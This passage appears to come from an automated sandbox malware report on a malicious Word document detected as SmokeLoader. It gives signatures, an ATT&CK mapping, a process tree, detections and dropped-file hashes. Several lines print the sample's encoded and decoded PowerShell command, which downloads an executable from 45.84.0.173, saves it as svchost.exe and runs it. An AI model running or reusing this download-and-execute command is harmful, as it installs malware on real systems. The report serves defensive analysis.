        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288, Thread sleep count: 459 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080, Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424, Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116, Thread sleep count: 1290 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116, Thread sleep count: 4270 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156, Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160, Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096, Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477 (3 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Code function: 7_2_0022092B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Code function: 7_2_00220D90 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Code function: 7_2_0244B7E8 push dword ptr fs:[00000030h]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug (2 identical entries)

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR
        Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; (3 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth; (2 identical entries)
        Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\timeout.exe timeout 3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c; (2 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa= (2 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation (2 identical entries)
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Code function: 7_2_0040512A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter

        Stealing of Sensitive Information

        Source: Yara match, File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality

        Source: Yara match, File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        MITRE ATT&CK Matrix (listed per tactic column; cells that carry a leading number are the techniques the report matched, with the report's own hit count; unnumbered cells are the matrix's unmatched entries)

        Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
        Resource Development: 22 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
        Execution: 111 Command and Scripting Interpreter, 12 Exploitation for Client Execution, 3 PowerShell, Cron, Launchd, Scheduled Task, Systemd Timers
        Persistence: 22 Scripting, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
        Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
        Defense Evasion: 11 Masquerading, 21 Virtualization/Sandbox Evasion, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 1 Obfuscated Files or Information, 1 DLL Side-Loading, Compile After Delivery
        Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
        Discovery: 1 System Time Discovery, 1 Security Software Discovery, 21 Virtualization/Sandbox Evasion, 2 Process Discovery, 1 Application Window Discovery, 1 File and Directory Discovery, 13 System Information Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
        Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
        Command and Control: 1 Encrypted Channel, 12 Ingress Tool Transfer, 1 Non-Application Layer Protocol, 11 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
        Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
        Behavior Graph ID: 1446716, Sample: 472.rtf.doc, Start date: 23/05/2024, Architecture: WINDOWS, Score: 100 (the graph image did not survive extraction; its nodes and edges are listed here).
        Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected SmokeLoader; 14 other signatures.
        • WINWORD.EXE: drops C:\Users\user\...\~DFF8D2936508DC487F.TMP (Composite); signature: Suspicious command line found; starts cmd.exe
        • cmd.exe: signatures: Suspicious powershell command line found, Encrypted powershell cmdline option found; starts powershell.exe and timeout.exe
        • powershell.exe: signatures: Encrypted powershell cmdline option found, Drops PE files with benign system names, Powershell drops PE file; starts a second powershell.exe
        • powershell.exe (second instance): contacts 45.84.0.173 (ports 49161, 80; ALEXHOSTMD, Russian Federation); drops C:\Users\user\AppData\Local\...\svchost.exe (PE32); starts svchost.exe
        • svchost.exe (dropped): signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file

        Source | Detection | Scanner | Label
        472.rtf.doc | 26% | ReversingLabs | Document-Word.Infostealer.Heuristic
        472.rtf.doc | 100% | Joe Sandbox ML |
        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | TR/Crypt.Agent.mvien
        C:\Users\user\AppData\Local\Temp\~DFF8D2936508DC487F.TMP | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\svchost.exe | 92% | ReversingLabs | Win32.Trojan.Smokeloader
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
        http://go.micros | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        http://45.84.0.173 | 0% | Avira URL Cloud | safe
        http://45.84.0.173/download_22/server.exe | 0% | Avira URL Cloud | safe
        http://go.cr | 0% | Avira URL Cloud | safe
        No contacted domains info
        Name | Malicious | Antivirus Detection | Reputation
        http://45.84.0.173/download_22/server.exe | false | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://45.84.0.173 | powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://go.micros | powershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://go.cr | powershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://contoso.com/ | powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/License | powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        IP | Domain | Country | ASN | ASN Name | Malicious
        45.84.0.173 | unknown | Russian Federation | 200019 | ALEXHOSTMD | false
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446716
        Start date and time:2024-05-23 20:14:16 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 7s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name: 472.rtf.doc
        renamed because original name is a hash value
        Original Sample Name: 472.rtf.doc
        Detection:MAL
        Classification:mal100.troj.expl.evad.winDOC@11/17@0/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 3084 because it is empty
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Not all processes were analyzed; the report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 472.rtf.doc
        Time | Type | Description
        14:15:06 | API Interceptor | 80x Sleep call for process: powershell.exe modified
        No context
        No context
        Match: ALEXHOSTMD
        Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
        support.Client.exe.zip | Get hash | malicious | ScreenConnect Tool | Browse | 176.123.10.70
        https://coanj.com/ | Get hash | malicious | Unknown | Browse | 45.142.212.163
        Q1a9z2AS7p.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        3sbAd2pTKO.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        5SgnZcDoHg.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        uKzd18tKZ2.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        9r8dnbGVit.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        Aklr8oRy7s.elf | Get hash | malicious | Mirai | Browse | 176.123.1.127
        a1IUAX8aGK.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        2Zg5TXmcsz.elf | Get hash | malicious | Unknown | Browse | 176.123.1.127
        No context
        No context
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):4742
        Entropy (8bit):4.8105940880640246
        Encrypted:false
        SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
        MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
        SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
        SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
        SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
        Malicious:false
        Reputation:low
        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):0.34726597513537405
        Encrypted:false
        SSDEEP:3:Nlll:Nll
        MD5:446DD1CF97EABA21CF14D03AEBC79F27
        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:@...e...........................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1144x1704, components 3
        Category:dropped
        Size (bytes):90841
        Entropy (8bit):7.106301701970938
        Encrypted:false
        SSDEEP:1536:1uLaHmmF7tG8Q/qk8fowr/5mUpKNEteuEC5/ThAoLCAJZSfxV:MLIt7tD/rRmCK6guEC5/ThAQSfxV
        MD5:17968648DD7404DC108135E6C110D486
        SHA1:764A94B573835FC2E281B8F6E5BBB28BC987F0B0
        SHA-256:8F43CB1BE6106FA2EF22BC8303A1B67AAB332346FF7E0A47C3B0757B8379FA68
        SHA-512:11183DC048932A14431CE0AEC645DD9B5097F36258DF1324CDE012BF935B6C58CB7B1412217538CE5371786D6778971087FCCFABFDFE9499CD39C17502AD3D94
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):20992
        Entropy (8bit):4.416521988282859
        Encrypted:false
        SSDEEP:192:yuDtF+YM7f5C6Pn6zihyV50jOXamtF+NM7f5C6Pn6zihyV50jOXa:jtMz7f5fh450j6tMO7f5fh450j
        MD5:1CC18D7233B2C280BD1757067C74D1B0
        SHA1:D3505976725317643CC264828D055F22E99A13CE
        SHA-256:F7E03F128F8F5957CC7BD46283A6701903D033BCF0BA9D88DD6104DFE74151CC
        SHA-512:A5D653E6E9D6BE0003F68D7D5BB1ECF0404E96275FE1CB3E471FF0629388BAF6698ACA1F4BD88C9F82F9C6BC685B6851CABAE14387B95349AA02EBCF283759BA
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.14296898889373857
        Encrypted:false
        SSDEEP:3:llYkkn/lPbKO+:ruV+
        MD5:F01927180D610C0437A5237A7CE292A7
        SHA1:EDA2A9619863C803A873C7692A99615DBE37E3D5
        SHA-256:3C08324AC1396335F485CFD5CA7B3942FFAF769CEC57FE37537EAFFE30AB06D4
        SHA-512:82689DAF2F731120F336ECF0CF71EC6AE43DE9037B2B4987A6F5D136F733FB151E79F417EB025ECBEF5CC64E99B4C0D1A5617D5596EC040C608D3B98190DD763
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):2
        Entropy (8bit):1.0
        Encrypted:false
        SSDEEP:3:X:X
        MD5:32649384730B2D61C9E79D46DE589115
        SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
        SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
        SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
        Malicious:false
        Preview:..
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):184320
        Entropy (8bit):5.854304013941445
        Encrypted:false
        SSDEEP:1536:DBk7z1TJEKLoBPuST/yC+ef27OClD2ZR6LaXQ1C9Hu1v3QN5tlQDeJqXHqGcyhoM:DuST/ym27DC8EYau1P45wY
        MD5:92C57DD80B764A028749520017D44E76
        SHA1:F732220ADAACF23DE6CC69D964341766D2E350D9
        SHA-256:DBD741A45D840D06D708339F9E9824F2A0D745EA6537CA44BFF233BA7441BFDA
        SHA-512:DD7D363FEF5750A256ABC2AE43D17F8E4788D392AFAA74A2085F34DA05EFEB12373F38FBF480E1C86EB2759C667C971C7C54512F5D59EE61F5A0A4341AC406C8
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 92%
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):30720
        Entropy (8bit):4.104344375944342
        Encrypted:false
        SSDEEP:384:ia6Y2BOAgmf5+Y7vg/heU7eAm50jUtKtsVzvlpzJop0ZG:0B+yvIqYtKvlpzJWz
        MD5:27B09AFDACE3E0955812682FB68DF4AC
        SHA1:10D3DDA12BAE6616618E06315D30604E43D883AF
        SHA-256:3FF6D489F4DF2CB71F50AE0CD10046915876942E740304971E97816132FA3ADD
        SHA-512:1E7DFC95B29F71E16B4FFBC70617CA5D9DABBEAC49E93D7BA7A8CDA87CFE57AB2162121B984AE34341E10D9E962B14D9BDBF66439DFAB9EFF7E16717F8BB299B
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Thu May 23 17:15:02 2024, length=74014, window=hide
        Category:dropped
        Size (bytes):1004
        Entropy (8bit):4.530894897623714
        Encrypted:false
        SSDEEP:12:8vYTRgXg/XAlCPCHaXZgzBpB/J89rX+W55ClNtOpicvbQCgA5DtZ3YilMMEpxRlw:8C/XTWzPc9/5ChbeMCDDv3q/k7N
        MD5:E59CC46735C9C7E403DE8E7184465910
        SHA1:83D54EF6C696DA236403B52C3DE51BA6EB0BCA60
        SHA-256:B7CB287C9A017A9CF5B18EB2AF399111715F7C47623F248245494A86CCA281C9
        SHA-512:EBBA36683E06B8644B839F4174713349A0D77941920AD622F559240A5C6C1B051AD5BA7EA46A7BFFABA57CBDCBDABB51EA15B1F0981116D25C51E6178348A64B
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:dropped
        Size (bytes):48
        Entropy (8bit):4.345175521464346
        Encrypted:false
        SSDEEP:3:M1RkL1LprFom481LprFov:M+13j13y
        MD5:FC7E7B191658D448C680E0096885A0B6
        SHA1:ECDE37FAEB5970DB4813F16072F47519BCC60435
        SHA-256:D1736879B63539683995BFF240858134EC0B374C5A11F34EF43D49008A7268DE
        SHA-512:C24CC93F4D70F37DB5F50F022519BBE025D25EC45FE014901188DE772DB2B4D532F79F5F808CBAFB70F95F6FFE51622E471FB4E1C1C54D36C90C029D1E11EF4A
        Malicious:false
        Preview:[doc]..472.rtf.LNK=0..[folders]..472.rtf.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        File type:Microsoft Word 2007+
        Entropy (8bit):7.205070030523837
        TrID:
